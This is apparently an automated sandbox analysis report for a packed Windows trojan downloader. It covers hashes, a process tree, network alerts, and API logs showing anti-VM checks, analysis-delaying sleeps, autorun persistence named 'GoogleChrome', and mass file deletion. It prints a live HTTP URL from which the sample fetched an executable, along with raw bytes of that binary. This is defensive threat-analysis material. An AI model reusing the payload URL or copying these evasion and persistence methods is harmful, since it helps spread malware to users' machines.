Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 17, 2025, 9:39 a.m.	March 17, 2025, 10:02 a.m.

Size	251.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`58d3a0d574e37dc90b40603f0658abd2`
SHA256	`dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5`
CRC32	`845647D0`
ssdeep	`6144:fo5FKmVjbskNWDV6wyZYbn5tMfWsfTx2n83Oixf:k8CskNiV6yo7eixf`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file

sss81242.exe "C:\Users\test22\AppData\Local\Temp\sss81242.exe"
2552
- vpZvQeDoVnhQnT6u.exe C:\Users\test22\AppData\Local\Temp\H7lidFjN\vpZvQeDoVnhQnT6u.exe 2552
  2648
  - gThseXGYz6VkS34E.exe C:\Users\test22\AppData\Local\Temp\dRA90OLc\gThseXGYz6VkS34E.exe 0
    2284
- NXonNmvE9cRRFfxL.exe C:\Users\test22\AppData\Local\Temp\NXonNmvE9cRRFfxL.exe 2552
  2684
- cHR8R5ijyj1Ic1Y9.exe C:\Users\test22\AppData\Local\Temp\cHR8R5ijyj1Ic1Y9.exe 2552
  2724
- aib0Q1C72l45FOvW.exe C:\Users\test22\AppData\Local\Temp\aib0Q1C72l45FOvW.exe 2552
  2764
- gV47SdjcEzTDlUBt.exe C:\Users\test22\AppData\Local\Temp\gV47SdjcEzTDlUBt.exe 2552
  2808
- 0STUp9LWMUPLvYAo.exe C:\Users\test22\AppData\Local\Temp\0STUp9LWMUPLvYAo.exe 2552
  2852
- YkHscCZsekqgi3Ns.exe C:\Users\test22\AppData\Local\Temp\YkHscCZsekqgi3Ns.exe 2552
  2920
- f7clVsTKgBeGBZm1.exe C:\Users\test22\AppData\Local\Temp\f7clVsTKgBeGBZm1.exe 2552
  2548
- z1yeYXhNXfWOcn4u.exe C:\Users\test22\AppData\Local\Temp\z1yeYXhNXfWOcn4u.exe 2552
  4560
- NJzn2Uzi0Eo8JgrZ.exe C:\Users\test22\AppData\Local\Temp\NJzn2Uzi0Eo8JgrZ.exe 2552
  4248
- Im8VwB4YUvmJZae6.exe C:\Users\test22\AppData\Local\Temp\Im8VwB4YUvmJZae6.exe 2552
  3388
- xqIyPU1Pncvy4Wif.exe C:\Users\test22\AppData\Local\Temp\xqIyPU1Pncvy4Wif.exe 2552
  4676
- Di940XWRk4TvkcIn.exe C:\Users\test22\AppData\Local\Temp\Di940XWRk4TvkcIn.exe 2552
  5408
- yXZJ2Z1iWleuXExA.exe C:\Users\test22\AppData\Local\Temp\yXZJ2Z1iWleuXExA.exe 2552
  14820
- qVHqqCmUJT4LLZxK.exe C:\Users\test22\AppData\Local\Temp\qVHqqCmUJT4LLZxK.exe 2552
  12456
- PyH3oS4HVckLB6EE.exe C:\Users\test22\AppData\Local\Temp\PyH3oS4HVckLB6EE.exe 2552
  3152
- ldlnYW79I6TMCEw3.exe C:\Users\test22\AppData\Local\Temp\ldlnYW79I6TMCEw3.exe 2552
  14288
- 0hZyrWhxomMrOptC.exe C:\Users\test22\AppData\Local\Temp\0hZyrWhxomMrOptC.exe 2552
  14052
- seJrfTgW2l6OVW78.exe C:\Users\test22\AppData\Local\Temp\seJrfTgW2l6OVW78.exe 2552
  5032
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
77.90.153.244	Active	Moloch
77.90.153.245	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 77.90.153.245:8293 -> 192.168.56.101:49238	2400006	ET DROP Spamhaus DROP Listed Traffic Inbound group 7	Misc Attack
TCP 77.90.153.244:80 -> 192.168.56.101:49236	2400006	ET DROP Spamhaus DROP Listed Traffic Inbound group 7	Misc Attack
TCP 192.168.56.101:49236 -> 77.90.153.244:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.90.153.244:80 -> 192.168.56.101:49236	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.90.153.244:80 -> 192.168.56.101:49236	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 353 events)

Time & API	Arguments	Status	Return
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 17, 2025, 9:40 a.m.	computer_name: TEST22-PC	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 17, 2025, 9:39 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 17, 2025, 9:40 a.m.	stacktrace: gthsexgyz6vks34e+0x1c207 @ 0x13feac207 gthsexgyz6vks34e+0x92bb @ 0x13fe992bb gthsexgyz6vks34e+0x182ac @ 0x13fea82ac BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521 exception.instruction_r: 44 0f b7 01 44 2b c0 75 19 48 2b ca 66 85 c0 74 exception.symbol: gthsexgyz6vks34e+0x1c207 exception.instruction: movzx r8d, word ptr [rcx] exception.module: gThseXGYz6VkS34E.exe exception.exception_code: 0xc0000005 exception.offset: 115207 exception.address: 0x13feac207 registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 1462631425 registers.rbx: 0 registers.rsp: 2948320 registers.r11: 254 registers.r8: 1435944852 registers.r9: 4294967295 registers.rdx: 5367399388 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 75 registers.r13: 0	1	0	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://77.90.153.244/l9543.exe

Performs some HTTP requests (1 event)

request

GET http://77.90.153.244/l9543.exe

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory March 17, 2025, 9:40 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0	0

A process attempted to delay the analysis task. (15 events)

description	aib0Q1C72l45FOvW.exe tried to sleep 1005 seconds, actually delayed analysis time by 1005 seconds
description	NXonNmvE9cRRFfxL.exe tried to sleep 1135 seconds, actually delayed analysis time by 1135 seconds
description	cHR8R5ijyj1Ic1Y9.exe tried to sleep 964 seconds, actually delayed analysis time by 964 seconds
description	yXZJ2Z1iWleuXExA.exe tried to sleep 317 seconds, actually delayed analysis time by 317 seconds
description	f7clVsTKgBeGBZm1.exe tried to sleep 855 seconds, actually delayed analysis time by 855 seconds
description	Di940XWRk4TvkcIn.exe tried to sleep 390 seconds, actually delayed analysis time by 390 seconds
description	z1yeYXhNXfWOcn4u.exe tried to sleep 787 seconds, actually delayed analysis time by 787 seconds
description	NJzn2Uzi0Eo8JgrZ.exe tried to sleep 526 seconds, actually delayed analysis time by 526 seconds
description	gV47SdjcEzTDlUBt.exe tried to sleep 788 seconds, actually delayed analysis time by 788 seconds
description	qVHqqCmUJT4LLZxK.exe tried to sleep 232 seconds, actually delayed analysis time by 232 seconds
description	0STUp9LWMUPLvYAo.exe tried to sleep 1185 seconds, actually delayed analysis time by 1185 seconds
description	vpZvQeDoVnhQnT6u.exe tried to sleep 155 seconds, actually delayed analysis time by 155 seconds
description	xqIyPU1Pncvy4Wif.exe tried to sleep 396 seconds, actually delayed analysis time by 396 seconds
description	Im8VwB4YUvmJZae6.exe tried to sleep 549 seconds, actually delayed analysis time by 549 seconds
description	YkHscCZsekqgi3Ns.exe tried to sleep 652 seconds, actually delayed analysis time by 652 seconds

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\dRA90OLc\gThseXGYz6VkS34E.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\Users\test22\AppData\Local\Temp\sss81242.exe
file	C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (39 events)

Time & API	Arguments	Status	Return
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: wsqmcons.exe process_identifier: 2360	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: sdclt.exe process_identifier: 2384	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: schtasks.exe process_identifier: 2604	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: conhost.exe process_identifier: 2612	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: vpZvQeDoVnhQnT6u.exe process_identifier: 2648	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: cHR8R5ijyj1Ic1Y9.exe process_identifier: 2724	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: aib0Q1C72l45FOvW.exe process_identifier: 2764	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: 0STUp9LWMUPLvYAo.exe process_identifier: 2852	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: inject-x86.exe process_identifier: 2884	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: is32bit.exe process_identifier: 2928	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: inject-x86.exe process_identifier: 3008	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: jbvQKg4NBz7qj9AV.exe process_identifier: 2072	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: z1yeYXhNXfWOcn4u.exe process_identifier: 4560	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: NJzn2Uzi0Eo8JgrZ.exe process_identifier: 4248	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: Im8VwB4YUvmJZae6.exe process_identifier: 3388	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: xqIyPU1Pncvy4Wif.exe process_identifier: 4676	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: is32bit.exe process_identifier: 3268	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: Di940XWRk4TvkcIn.exe process_identifier: 5408	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: XgT8fIjJ9xTpZvbr.exe process_identifier: 5684	1	1
Process32NextW March 17, 2025, 9:39 a.m.	snapshot_handle: 0x000000b4 process_name: inject-x86.exe process_identifier: 11684	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: yXZJ2Z1iWleuXExA.exe process_identifier: 14820	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: ALpSpiz52AkC9XPx.exe process_identifier: 3600	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: qVHqqCmUJT4LLZxK.exe process_identifier: 12456	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: svchost.exe process_identifier: 3676	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: jbF2ECdGvtE5MgyP.exe process_identifier: 7320	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: svchost.exe process_identifier: 12840	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: PyH3oS4HVckLB6EE.exe process_identifier: 3152	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: mscorsvw.exe process_identifier: 6272	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: Gi8gEoigS8QhMAJY.exe process_identifier: 3816	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: cmd.exe process_identifier: 7192	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: conhost.exe process_identifier: 7612	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: inject-x86.exe process_identifier: 9212	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: ldlnYW79I6TMCEw3.exe process_identifier: 14288	1	1
Process32NextW March 17, 2025, 9:40 a.m.	snapshot_handle: 0x000000b4 process_name: oNIAYHqZco1LxuBC.exe process_identifier: 11520	1	1
Process32NextW March 17, 2025, 9:41 a.m.	snapshot_handle: 0x000000b4 process_name: 0hZyrWhxomMrOptC.exe process_identifier: 14052	1	1
Process32NextW March 17, 2025, 9:41 a.m.	snapshot_handle: 0x000000b4 process_name: pMImFrnHbHgq9xQY.exe process_identifier: 7420	1	1
Process32NextW March 17, 2025, 9:41 a.m.	snapshot_handle: 0x000000b4 process_name: inject-x86.exe process_identifier: 8220	1	1
Process32NextW March 17, 2025, 9:41 a.m.	snapshot_handle: 0x000000b4 process_name: seJrfTgW2l6OVW78.exe process_identifier: 5032	1	1
Process32NextW March 17, 2025, 9:41 a.m.	snapshot_handle: 0x000000b4 process_name: Pkf3AwCJxtMPlg04.exe process_identifier: 7376	1	1

An executable file was downloaded by the process vpzvqedovnhqnt6u.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile March 17, 2025, 9:39 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd õ}Õgð"Þ@p `x,(´àhà±@/h.text§ `.rdata°¢@@.data@ P@@À.pdata´L@@.gxfgà b@@.retplneÀv_RDATAôÐx@@.relochàz@B.bsszðz@ÀAWAVAUATVWUSHìHæ@H1àH$T$tHL$hÇD$déÑ[ÇD$`T$tHL$hT$,èðT$,òÿâ«[ÅaA¸ÿÿÿÿEÁAñ«[ÅaDT$,E!ÊEÃAóÿÿÿÿAã«[ÅaAáÿÿÿÿD ÒE ËD1ÚòÿAÁA1ÑA!ÁÂòÿâÈùÅ;EÂAòÈùÅ;D!ÐAðÿÿÿÿAàÈùÅ;Aâÿÿÿÿ ÂE ÐD1ÂòÿD$,1ÐT$,!ÐEÈA!ÀA1ÁE ÈDD$\HL$hèOHD$PHL$hè0HÁèD$LÇD$HÇD$0 w_D$0Áé w_D$(^éD$(-,õéD$(-ÁçÈ¸½éD$(-Ù{`Áü éD$(-RÉéD$(-àéD$(-øRózéD$(-QrùdéD$(-¤ËÅéD$(-6w éD$(-ì$) éD$(-ZX)CéD$(-J¹§0 éD$(-;á`ûéD$(-ÄkbzéD$(-ËhséD$(-riuIéD$(-]g»ééD$H;D$L¸à¹ÁçÈ¸LÈL$0é1À FIDIAÈAè¬XØUAèßz1§AÀ¬XØUèAÀAÀÿòïAÀßz1§AèÿòïA¯ÈáùAÁú AÂEËAóÿDÓóÿ@¶@÷@÷AÛ@ÏAóÿA ûDËóÿD×@ ßAòÿE ÑDÏEÙAñÿAúAòÿ@öDËãÿA óDÕ@åÿ@ ÷DÛ@ý@0ëEÑAñÿ@ÎA ñDËöÃ¸¤Ë¹riuEÈL$0é1ÀHL$PT$HÁâLcÂBT$DiT$DéÑ[T$DT$DÁêDL$DEÊAòÿAâÿÿÿÿA»ÿÿÿÿDÞöÿÿÿÿDÏ!÷A úAòÿÖD1Ö!ÖAÒAòÿAâÿÿÿÿDß÷ÿÿÿÿ!úA ÒAñÿAòÿDÚòâóYrE ÑÊâóYrAñÿA!ÑòD!ÊD1Î òT$DiT$DéÑ[T$DiT$\éÑ[T$\T$DDL$\EÊAòÿAâÿÿÿÿDÞöÿÿÿÿDÏ!÷A úÖöÿAòÿDß÷nîD ÖÏnîöÿ!þAÒAòÿAâÿÿÿÿDß÷ÿÿÿÿ!úA ÒAòÿDÊD1ÒD!ÊAñAñÿAÒAòÿAóïùDÏçïùD!ÞDÓãïùD!Ú ÷ Ó1ßE ÑAñÿAËïùE!ÙD Ï\|$\ßFD ÜFAÂAêcåhgAÓE)ÓèAÃAÃù¥NEAëcåhgAëù¥NEA¯Óâú@ÅAù AÆE÷A÷ÿAìE0üA ìAïA÷ÿAçAµAõD íDð4ÿ$E îAïDðA0ÇDàD øE0üDà¨ºÄkbA¹riuDEÊDL$0ékÇD$0Ëhé^1ÀL$Hºt·ýÂ)Êêt·ýÁé×ü!#éÁ×ü!#AÀA)ÈD)Â)ÐÀD$HÇD$0 w_éHD$PL$LÁáHcÑHÐHD$8ÇD$4HL$hèôHÇÁÿÿÿÿHÊHòHâÿÿÿÿIÈIðÿÿÿÿIàL ÂIÀIðÿÿÿÿI¹>ìÿâNM!ÈIÊM1ÊIÃM!ÓHÖHöÿÿÿÿL!ÎL!ÒM ØH ÖI1ðIðÿÿÿÿH5ÿÿÿÿHºÖãº½ìtÃ H1ÑI ÀH ÑIðÿÿÿÿI!ÈLD$xÇD$0,õéKHD$xHø¹QrùºRÉLÑT$0é,HD$xHø¹Ù{`Áº]gLÑT$0é HD$xHø¹øRóºì$DÑT$0éî1À ³D±DAÈAèjzòAè×BAÀjzòAÁAéEÈAÁE)ÁAÀAè×BEÁD)È¯ÈáùAÂú AÃDÛóÿDÖ@0ÞD ÖDÓóÿã@·@ý@õA êEÞAöÿAæÿA ëDÓEÞD0óAòAòÿAÛAóÿ@÷DÕ@åÿ@ þEÞAæÿ@ û@õAÞD0õEÚAòÿ@ÏA úDÕ@öÅ¸;á`¹ZX)EÈL$0éþ HD$8¾HÁáT$4AÐAðÿAàdÏ$ÈA¹ÿÿÿÿEÊAòdÏ$ÈAÓE!ÓDÎöÿÿÿÿædÏ$ÈAâÿÿÿÿE ØD ÖA1ðAÊAòÿAðÿEËAó ¯ÉE ÂAË ¯ÉAòÿE!ÚAÈAðÿAàÿÿÿÿAñÿÿÿÿD!ÉA ÈAðÿÑD1Á!ÑDÒ!ÊA1ÊD ÒT$4 CCAÈAÀj¨gAè¢Âq¥Aèj¨gAÀcáEdAèAècáEdAè¨óÇAÀ¢Âq¥AÀ¨óÇA¯ÈáùÃú @Ç@Ý@õÿ@åA¶E÷A÷AÜE üEõAõAåÿAçDåEýD0íAÿA÷ÿAçEôAôAýE åDð4$AäEïDàA0ÇDð4$EôAôEåAåDññáAäDèDá0È@éñÿEôAôEõAõDáAÍñÿD éAÄAôÿAÝE0 request_handle: 0x00cc000c	1	1	0

Expresses interest in specific running processes (27 events)

process	aib0q1c72l45fovw.exe
process	nxonnmve9crrffxl.exe
process	sss81242.exe
process	pmimfrnhbhgq9xqy.exe
process	di940xwrk4tvkcin.exe
process	z1yeyxhnxfwocn4u.exe
process	njzn2uzi0eo8jgrz.exe
process	gv47sdjceztdlubt.exe
process	im8vwb4yuvmjzae6.exe
process	gi8geoigs8qhmajy.exe
process	alpspiz52akc9xpx.exe
process	0stup9lwmuplvyao.exe
process	vsoifcvryt3cw1za.exe
process	qvhqqcmujt4llzxk.exe
process	ldlnyw79i6tmcew3.exe
process	oniayhqzco1lxubc.exe
process	chr8r5ijyj1ic1y9.exe
process	yxzj2z1iwleuxexa.exe
process	f7clvstkgbegbzm1.exe
process	xqiypu1pncvy4wif.exe
process	jbvqkg4nbz7qj9av.exe
process	pkf3awcjxtmplg04.exe
process	pyh3os4hvcklb6ee.exe
process	jbf2ecdgvte5mgyp.exe
process	0hzyrwhxommroptc.exe
process	xgt8fijj9xtpzvbr.exe
process	ykhscczsekqgi3ns.exe

Communicates with host for which no DNS query was performed (2 events)

host	77.90.153.244
host	77.90.153.245

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GoogleChrome				reg_value	C:\Users\test22\AppData\Local\Temp\H7lidFjN\vpZvQeDoVnhQnT6u.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\NJzn2Uzi0Eo8JgrZ.exe

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 122 events)

file	C:\Users\test22\AppData\Local\Temp\0STUp9LWMUPLvYAo.exe
file	C:\Users\test22\AppData\Local\Temp\FXSAPIDebugLogFile.txt
file	C:\Users\test22\AppData\Local\Temp\NJzn2Uzi0Eo8JgrZ.exe
file	C:\Users\test22\AppData\Local\Temp\vsoIfCvryt3cW1ZA.exe
file	C:\Users\test22\AppData\Local\Temp\tmpfcimyk
file	C:\Users\test22\AppData\Local\Temp\Di940XWRk4TvkcIn.exe
file	C:\Users\test22\AppData\Local\Temp\cHR8R5ijyj1Ic1Y9.exe
file	C:\Users\test22\AppData\Local\Temp\seJrfTgW2l6OVW78.exe
file	C:\Users\test22\AppData\Local\Temp\tmpv0u7lo
file	C:\Users\test22\AppData\Local\Temp\Im8VwB4YUvmJZae6.exe
file	C:\Users\test22\AppData\Local\Temp\xqIyPU1Pncvy4Wif.exe
file	C:\Users\test22\AppData\Local\Temp\PyH3oS4HVckLB6EE.exe
file	C:\Users\test22\AppData\Local\Temp\tmpnc7lwr
file	C:\Users\test22\AppData\Local\Temp\aib0Q1C72l45FOvW.exe
file	C:\Users\test22\AppData\Local\Temp\z1yeYXhNXfWOcn4u.exe
file	C:\Users\test22\AppData\Local\Temp\tmpq6yfmb
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file	C:\Users\test22\AppData\Local\Temp\java_install_reg.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000011.log
file	C:\Users\test22\AppData\Local\Temp\dd_dotnet4.5_decompression_log.txt
file	C:\Users\test22\AppData\Local\Temp\sss81242.exe
file	C:\Users\test22\AppData\Local\Temp\dd_dotNetFx45LP_Full_x86_x64ko_decompression_log.txt
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log
file	C:\Users\test22\AppData\Local\Temp\jawshtml.html
file	C:\Users\test22\AppData\Local\Temp\~DFB8537D6963ECB123.TMP
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000013.log
file	C:\Users\test22\AppData\Local\Temp\tmpaddon-1
file	C:\Users\test22\AppData\Local\Temp\dd_SetupUtility.txt
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00001.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152043A34).log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C).log
file	C:\Users\test22\AppData\Local\Temp\RGI1518.tmp-tmp
file	C:\Users\test22\AppData\Local\Temp\DMI9EEF.tmp
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000017.log
file	C:\Users\test22\AppData\Local\Temp\chrome_installer.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(20180405152131B24).log
file	C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 KOR Language Pack Setup_20200715_141443571.html
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000020.log
file	C:\Users\test22\AppData\Local\Temp\RGIC87.tmp-tmp
file	C:\Users\test22\AppData\Local\Temp\java_install.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000007.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file	C:\Users\test22\AppData\Local\Temp\bchC68D.tmp
file	C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 Setup_20200715_141303844.html
file	C:\Users\test22\AppData\Local\Temp\PrinterSetup.log
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00002.log
file	C:\Users\test22\AppData\Local\Temp\dd_TMPA86C.tmp_decompression_log.txt

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Lionic	Trojan.Win32.BackdoorX.m!c
MicroWorld-eScan	Gen:Variant.Doina.84317
CTX	exe.trojan.generic
Skyhigh	BehavesLike.Win32.Downloader.dh
ALYac	Gen:Variant.Doina.84317
